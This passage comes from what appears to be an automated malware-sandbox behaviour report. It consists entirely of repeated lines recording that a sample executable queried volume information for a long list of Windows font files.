                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
